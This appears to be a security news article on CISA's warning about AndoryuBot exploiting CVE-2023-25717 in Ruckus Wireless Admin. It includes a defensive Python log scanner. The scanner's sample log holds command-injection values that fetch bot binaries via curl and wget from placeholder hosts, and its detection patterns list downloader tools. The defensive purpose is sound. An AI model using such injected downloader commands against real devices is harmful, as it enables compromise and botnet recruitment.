CISA WARNS: ANDORYUBOT EXPLOITS RUCKUS WIRELESS ADMIN VIA RCE

CISA, the US Cybersecurity and Infrastructure Security Agency, has warned that a remote code execution vulnerability in Ruckus Wireless devices is being actively exploited.

In February 2023 CISA released a recovery script for VMware ESXi servers hit by the ESXiArgs ransomware campaign, and in March it released the Untitled Goose Tool, an incident-response utility for Microsoft Azure and Microsoft 365 environments. This advisory is another of its many contributions to the cybersecurity industry.

The advisory concerns CVE-2023-25717, a cross-site request forgery (CSRF) flaw in the Ruckus Wireless Admin panel (versions 10.4 and earlier) that leads to remote code execution (RCE) and affects multiple Ruckus Wireless products.

As reported, the vulnerability affects multiple Ruckus Wireless products running the affected Wireless Admin versions. It enables a remote, unauthenticated threat actor to execute arbitrary code and take control of any device that is still unpatched and exposed.

According to FortiGuard Labs, a botnet that uses the SOCKS protocol was observed being distributed through vulnerable Ruckus devices. The botnet was identified as AndoryuBot, which was first reported in February 2023.

It can launch DDoS (Distributed Denial of Service) attacks using several different protocols and communicates with its C2 (command-and-control) server through SOCKS5 proxies. Fortinet's IPS signature trigger counts show the distribution of this variant ramping up from mid-April 2023.

The malware exploits this weakness in Ruckus Wi-Fi devices to spread.


IPS (Intrusion Prevention System) Signatures

Image source: Fortinet

MODE OF INFECTION:

Infection begins with the threat actors exploiting the Ruckus Wireless Admin vulnerability to gain access to the device. The compromised device then downloads a script that fetches the bot binary and propagates further.

According to Fortinet:

"The AndoryuBot variant in their analysis shows that the targeted architectures are: arm, m68k, mips, mpsl, sh4, spc, and x86. The file was saved under the name “Andoryu”, and that is how the campaign name was derived."

The download script fetches each architecture's binary with curl. Although the script also references a “.ppc” binary, that link does not return a valid executable; instead it contains the string “invalid file bixxh axx boi”.

The Andoryu downloading script

Image source: Fortinet

The botnet spreads through the unauthenticated HTTP GET request shown in the image below. According to the proof of concept, a successful request exposes administrative information such as the username, password, and IP address. Once compromised, the device is enrolled as a zombie in the botnet, which is designed to launch DDoS attacks.

The Andoryu downloading script

Image source: cybir.com

To fund their operation, the threat actors sell access to the botnet as a DDoS-for-hire service, accepting payment via Cash App and cryptocurrencies such as Bitcoin.

The Andoryu downloading script

Image source: Fortinet

The admin panel is compromised through remote code execution (RCE) triggered by a single unauthenticated HTTP GET request.

The Ruckus wireless Admin Panel

Image source: Cybir.com

A proof of concept for the attack was published by Ken Pyle, a partner at CYBIR, in which he disclosed the strategies a threat actor can use to exploit the vulnerable Wi-Fi devices.
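The exploit request itself is not reproduced here, but defenders can look for its tell-tale shape in web-server or reverse-proxy logs: an unauthenticated GET to the admin login form whose parameters carry shell command-substitution characters or a downloader command such as curl or wget. The following detector is an added example written for this article; it is not code from the original page, from Fortinet, or from the CYBIR proof of concept. The log format, the /admin/login path, the parameter names, and the IP addresses are constructed placeholders, not values taken from the advisory.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (Apache combined-style). The /admin/login path,
# the parameter names and the IP addresses are hypothetical placeholders for this
# example; they are not taken from the advisory or from the CYBIR proof of concept.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2023:12:01:02 +0000] "GET /admin/login?login_username=admin&password=secret HTTP/1.1" 200 512
203.0.113.9 - - [10/May/2023:12:01:05 +0000] "GET /admin/login?login_username=admin&password=x%24%28curl%20http%3A%2F%2F198.51.100.5%2Fbins%2Fandoryu.mips%20-o%20%2Ftmp%2Fa%29 HTTP/1.1" 200 12
198.51.100.22 - - [10/May/2023:12:02:10 +0000] "GET /admin/status HTTP/1.1" 302 0
203.0.113.9 - - [10/May/2023:12:02:40 +0000] "GET /admin/login?login_username=admin&password=a%60wget%20198.51.100.5%2Fa.sh%60 HTTP/1.1" 200 12
203.0.113.11 - - [10/May/2023:12:03:01 +0000] "POST /admin/login HTTP/1.1" 200 512
203.0.113.12 - - [10/May/2023:12:03:30 +0000] "GET /admin/login?login_username=admin&password=%2524%2528id%2529 HTTP/1.1" 200 12
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)
# Shell command-substitution and command-chaining characters that have no business
# in a login-form parameter.
SHELL_META = re.compile(r'\$\(|`|&&|\|\||[;|]')
# Download utilities commonly used by IoT bot droppers to fetch a second stage.
DOWNLOADERS = re.compile(r'\b(curl|wget|tftp|ftpget|busybox)\b', re.IGNORECASE)


def full_decode(value, rounds=3):
    """Undo repeated percent-encoding: a double-encoded payload slips past a
    single unquote() followed by a naive metacharacter filter."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def query_params(query):
    """Split the raw query string ourselves (only on '&') so an unencoded ';'
    inside a value is not treated as a separator, then fully decode each side."""
    for pair in query.split('&'):
        if not pair:
            continue
        name, _, value = pair.partition('=')
        yield full_decode(name), full_decode(value.replace('+', ' '))


def inspect_request(line):
    """Return a finding dict for a suspicious GET request, else None."""
    m = LOG_RE.match(line)
    if not m or m.group('method') != 'GET':
        return None
    parts = urlsplit(m.group('target'))
    reasons = []
    for name, value in query_params(parts.query):
        if SHELL_META.search(value):
            reasons.append('shell metacharacters in %s' % name)
        if DOWNLOADERS.search(value):
            reasons.append('download utility in %s' % name)
    if not reasons:
        return None
    return {'ip': m.group('ip'), 'time': m.group('ts'),
            'path': parts.path, 'reasons': reasons}


def scan_log(text):
    """Run inspect_request over every line and collect the findings."""
    return [f for f in map(inspect_request, text.splitlines()) if f]


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Against the constructed sample the scan flags the two requests carrying `$(curl ...)` and backtick-wrapped `wget ...`, and the double-encoded `%2524%2528id%2529`, which a single round of decoding would have missed; the benign login, the status page, and the POST are ignored. In production the equivalent of this check is a vendor IPS signature such as the one Fortinet published, but the underlying fix is the same either way: the admin panel should never be reachable from untrusted networks, and the firmware must be updated.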

THE SEVERITY SCORE: 

The CVSS version 3.x base score is 9.8, which is rated Critical. The vector string is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H: the attack is launched over the network (AV:N) with low complexity (AC:L), requires no privileges (PR:N) and no user interaction (UI:N), leaves the scope unchanged (S:U), and has high impact on confidentiality, integrity, and availability (C:H/I:H/A:H). The breakdown is shown in the image below:

Severity score breakdown and analysis

Image source: nvd.nist.gov

CISA ISSUING BOD 22-01 TO FCEB:

Under Binding Operational Directive (BOD) 22-01, CISA added CVE-2023-25717 to its Known Exploited Vulnerabilities (KEV) catalog, which requires Federal Civilian Executive Branch (FCEB) agencies to apply the vendor's security update by the assigned due date in order to protect FCEB networks from active exploitation. BOD 22-01 is binding only on FCEB agencies, although CISA urges all organizations to prioritize remediation of KEV entries.

REMEDY AND SOLUTION FROM BEING INFECTED WITH ANDORYU:

According to Fortinet, the malware is detected and blocked by FortiGuard Antivirus under the signature name ELF/Andoryu.CBN!tr.

The FortiGuard Antivirus engine is part of FortiGate, FortiMail, FortiClient, and FortiEDR, so customers of those products are covered. Fortinet also advises users to keep their antivirus definitions up to date to remain protected.

Fortinet has further released IPS (Intrusion Prevention System) signatures that block the exploits in the botnet's exploit list, including the Ruckus Wireless Admin vulnerability.


2 Comments
Jonathan Kennedy

Error stating Ken Pyle is from CommScope; he is a Partner at CYBIR.